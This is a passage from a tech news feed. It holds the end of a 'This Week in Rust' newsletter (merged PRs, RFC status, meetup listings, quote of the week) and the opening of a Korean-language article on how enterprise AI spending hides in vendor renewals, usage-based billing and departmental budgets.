<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>426 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-23..2026-06-30">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157996">drop the full-crate AST walk in <code>check_unused</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158185">make <code>stable_crate_ids</code> reads lock-free after crate loading</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158239">rework lint pass running</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157271">simplify some <code>proc_macro</code> things</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158326">add <code>io::ErrorKind::TooManyOpenFiles</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153097">expand <code>OptionFlatten</code>'s iterator methods</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155625">move <code>std::io::Error</code> into <code>core</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158053">optimize network address parser</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17106">add <code>-Zhint-msrv</code> flag</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17237"><code>filter_map_next</code>: clean-up, overhaul suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17318"><code>chunks_exact_to_as_chunks</code>: Prevent syntactically invalid suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17317"><code>chunks_exact_to_as_chunks</code>: Use correct method name in message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17316"><code>chunks_exact_to_as_chunks</code>: Pick iter method depending on mut-ness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17302"><code>non_ascii_literal</code>, <code>invisible_characters</code>: don't suggest a fix on raw strings</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17228">create a single <code>ConstEvalCtxt</code> in <code>expr_eagerness</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17299">detect new range types in <code>higher::Range</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17270">do not trigger <code>manual_option_zip</code> when map receiver is a lazy evaluated expression</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16746">enhance <code>needless_late_init</code> to cover grouped assignments</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17257">fix: <code>borrow_as_ptr</code> is triggered on generated code</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22466">add diagnostic for E0596</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22645">add fixes add '.await' for <code>type_mismatch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22646">crash on lowering consts with associated types</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22640">crash when hovering on anonymous consts</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22582">only run <code>Drop::drop</code> when implemented</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22633">mark <code>inline_convert_while_ascii()</code> as <code>unsafe</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22115">switch out lsp-types for gen-lsp-types</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>Overall, the week was fairly neutral, with no meaningful shift on most benchmarks on any of our statistics.</p>
<p>Triage done by <strong>@simulacrum</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=8b6558a02b2774acfb25cf15e199467c37ba7490&amp;end=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;absolute=false&amp;stat=instructions%3Au">8b6558a0..7dc2c162</a></p>
<p>2 Regressions, 1 Improvement, 7 Mixed; 5 of them in rollups
34 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/master/triage/2026/2026-06-29.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/issues/143989">Tracking Issue for LocalKey/Cell::update</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/142312">Tracking Issue for <code>{str, [T], Path}::trim_prefix</code> and <code>{str, [T]}::trim_suffix</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155697">Stabilize c-variadic function definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/69835">Tracking Issue for layout information behind pointers</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158523">Fix feature gate for <code>repr(simd)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/154585">reat no_mangle_generic_items as hard error instead of lint warning</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158302">Fix <code>overflowing_literals</code> lint with repeated negation</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158504">stabilize <code>extern "custom"</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158057">Don't escape U+FF9E and U+FF9F in <code>escape_debug_ext</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1007">Decouple <code>BackendRepr</code> from ABI alignment</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1005">MCP: Stabilization strategy for rustc parallel frontend</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2166">Fields must fit in the type, even for repr(Rust)</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-rfcs"></a><a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3527">RFC: Associated const underscore</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3980">Add <code>extern "custom"</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#unsafe-code-guidelines"></a><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>
<ul>
<li><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues/615">Opsem extension proposal: atomic volatile accesses</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3977">Method chain as item</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3980">Add <code>extern "custom"</code></a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-01 - 2026-07-29 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-01 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210366/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455932/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/315211402/"><strong>Learning Game Development the Hard Way with Rust and Bevy</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345243/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-05 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095287/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-07 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315060981/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-01 | Köln, DE | <a href="https://www.meetup.com/rust-cologne-bonn">Rust Cologne</a><ul>
<li><a href="https://www.meetup.com/rustcologne/events/315404678/"><strong>Rust in July: Vecs and Strings and Slices, Oh My!</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315200163/"><strong>Rust Manchester June Talks</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Oxford, UK | <a href="https://www.meetup.com/oxford-rust-meetup-group">Oxford ACCU/Rust Meetup.</a><ul>
<li><a href="https://www.meetup.com/oxford-rust-meetup-group/events/315409335/"><strong>Building a file system from scratch</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Edinburgh, UK | <a href="https://www.meetup.com/rust-edi">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314941098/"><strong>Bevy, Bits, &amp; Cats (Rust July Talks)</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Enschede, NL | <a href="https://www.meetup.com/dutch-rust-meetup">Baseflow Tech Meetups</a><ul>
<li><a href="https://www.meetup.com/baseflow-tech-meetups/events/315099547/"><strong>AI Summit</strong></a></li>
</ul>
</li>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a><ul>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-02 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/315103359/"><strong>Git is easy?</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225861/"><strong>Boston University Rust Lunch, July 4</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>I <em>do</em> rather hope anyone using <code>-Zllvm-target-features</code> or any stabilized form thereof would know that they are getting a conversation with the dragon directly and they should mind their words carefully if they do not wish to be barbecued by it and served over a nice plate of iron filings.</p>
</blockquote>
<p>– <a href="https://rust-lang.zulipchat.com/#narrow/channel/233931-t-compiler.2Fmajor-changes/topic/Add.20.60-Zllvm-target-feature.60.20target.20.2Amodif.E2.80.A6.20compiler-team.23994/near/606147265">workingjubilee on rust zulip</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1784">Tomáš Šedovič</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ul6xfl/this_week_in_rust_658/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI 비용, 생각보다 깊이 숨어 있다…벤더 계약부터 사업부 예산까지]]></title>
<description><![CDATA[AI 도입이 빠르고 광범위하게 확산되면서, 많은 CIO는 조직이 AI에 실제로 얼마나 많은 비용을 지출하고 있는지 제대로 파악하지 못하고 있다.



컨설팅 기업 프로티비티(Protiviti)의 ‘2026 AI 펄스 서베이(2026 AI Pulse Survey)’에 따르면, 기업의 약 3분의 2는 직원이 적절한 관리·감독 없이 AI를 사용한 적이 있다고 답했다. 또한 대기업의 절반 가까이는 직원들이 어떤 AI 도구를 사용하고 있는지 완전히 파악하지 못하는 것으로 나타났다. IBM의 ‘2026 테크 리더 스터디(2026 Tech...]]></description>
<link>https://tsecurity.de/de/3640155/it-nachrichten/ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640155/it-nachrichten/ai/</guid>
<pubDate>Thu, 02 Jul 2026 07:03:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI 도입이 빠르고 광범위하게 확산되면서, 많은 CIO는 조직이 AI에 실제로 얼마나 많은 비용을 지출하고 있는지 제대로 파악하지 못하고 있다.</p>



<p>컨설팅 기업 프로티비티(Protiviti)의 <a href="https://www.protiviti.com/sites/default/files/2026-05/aipulse26-vol4-survey-booklet-0426-na-en-protiviti.pdf" target="_blank" rel="nofollow">‘2026 AI 펄스 서베이</a>(2026 AI Pulse Survey)’에 따르면, 기업의 약 3분의 2는 직원이 적절한 관리·감독 없이 AI를 사용한 적이 있다고 답했다. 또한 대기업의 절반 가까이는 직원들이 어떤 AI 도구를 사용하고 있는지 완전히 파악하지 못하는 것으로 나타났다. IBM의 ‘<a href="https://www.ibm.com/thought-leadership/institute-business-value/en-us/report/2026-cxo" target="_blank" rel="nofollow">2026 테크 리더 스터디</a>(2026 Tech Leader Study)’에서는 기술 리더의 77%가 AI 도입 속도가 이미 조직의 거버넌스 역량을 앞지르고 있다고 응답했다.</p>



<p>프로티비티 글로벌 기술 리스크 및 복원력(Technology Risk &amp; Resilience) 부문 총괄인 앤드루 리트럼(Andrew Retrum)은 “기업들이 AI 도입을 서두르는 속도와 AI를 활용하기 위한 기술적 진입 장벽이 매우 낮다는 점이 맞물리면서, AI 활용 현황을 지속적으로 파악하기가 매우 어려운 환경이 됐다”라고 설명했다.</p>



<p>이는 과거의 ‘섀도 IT’와는 성격이 다르다. 재무적 위험의 원인이 직원들이 무단으로 챗GPT를 구독하는 데 있는 것이 아니라, 벤더 계약 갱신, 사용량 기반 과금, 사업부 예산 곳곳에서 AI 비용이 누적되고 있기 때문이다. 일부 CIO는 초기부터 이러한 비용을 아키텍처에 반영해 전체 지출을 완전히 파악하고 있지만, 대부분은 이제야 이를 따라잡는 단계에 있다. 일부 기업은 비용보다 더 중요한 문제를 제대로 들여다보지 못하고 있다는 사실을 뒤늦게 깨닫고 있다.</p>



<h2 class="wp-block-heading">돈은 어디에 숨어 있나</h2>



<p>AI 비용은 대부분의 조직이 충분히 주목하지 않는 세 곳에서 발생하고 있다.</p>



<p>첫 번째는 벤더 제품에 내장된 AI 기능이다. 소프트웨어 공급업체들은 기존 제품에 AI 기능을 조용히 추가하고 있으며, 그 비용은 새로운 항목으로 청구되는 대신 계약 갱신 시 인상된 비용에 반영된다. 가트너가<a href="https://www.gartner.com/en/documents/6983866" target="_blank" rel="nofollow"> 2025년 9월 발표한 조사에 따르면</a>, 일부 솔루션은 벤더가 사전 고지 없이 AI 기능을 추가하면서 계약 갱신 비용이 최대 30%까지 증가한 것으로 나타났다.</p>



<p>두 번째는 사용량 기반 과금이다. 가트너는 “생성형 AI 비용의 대부분은 구축(Build)이 아니라 운영(Run) 단계에서 발생한다”라며 “추론(Inference), API 호출, 파인튜닝(Fine-tuning), 사용량 기반 과금은 규모가 커질수록 비용이 빠르고 예측하기 어려운 방식으로 증가한다”라고 분석했다.</p>



<p>컨설팅 기업 코너스톤 리서치(Cornerstone Research)의 최고기술혁신책임자(CTIO) <a href="https://www.linkedin.com/in/philleslie/" target="_blank" rel="nofollow">필 레슬리</a>(Phil Leslie)는 이를 직접 경험했다고 말했다.</p>



<p>레슬리는 “제미나이는 이용료가 정액제이기 때문에 비용을 모니터링하는 것이 큰 의미가 없다”라며 “반면 클로드 코드는 사용량 기반 과금 방식이어서 도입이 확대될수록 지출도 함께 늘어난다. 비용이 증가하는 것을 확인한 뒤 이에 맞춰 대시보드를 구축해 관리하고 있다”라고 설명했다.</p>



<p>하지만 전체 비용을 한눈에 파악하는 일은 쉽지 않다.</p>



<p>레슬리는 “클로드 코드, 기본 클로드 서비스, MS 오피스에서 쓰이는 클로드 플러그인 전반에 걸친 비용을 통합적으로 파악하는 것은 결코 간단한 일이 아니다”라고 말했다.</p>



<p>세 번째는 사업부 주도의 AI 도입이다. 각 부서가 법인카드나 자체 예산을 활용해 AI 솔루션을 구매하면서 IT 부서의 관리 범위를 벗어나는 사례가 늘고 있다.</p>



<h2 class="wp-block-heading">처음부터 가시성을 고려한 설계</h2>



<p>통신 솔루션 기업 콕스 비즈니스(Cox Business)의 AI 총괄 <a href="https://www.linkedin.com/in/ericpace/" target="_blank" rel="nofollow">에릭 페이스</a>(Eric Pace)는 자사가 AI 지출을 100% 파악하고 있다고 밝혔다. 다만 이를 위해서는 처음부터 아키텍처와 거버넌스를 의도적으로 설계하는 과정이 필요했다.</p>



<p>페이스는 “일상 운영(BAU, Business as Usual) 과정에서 활성화되는 SaaS 기반 AI 모듈, 신규 AI 솔루션 구매, 전사 토큰 사용량까지 모든 AI 지출을 100% 파악하고 있다”라고 설명했다.</p>



<p>핵심은 중앙집중화와 명확한 책임 체계였다.</p>



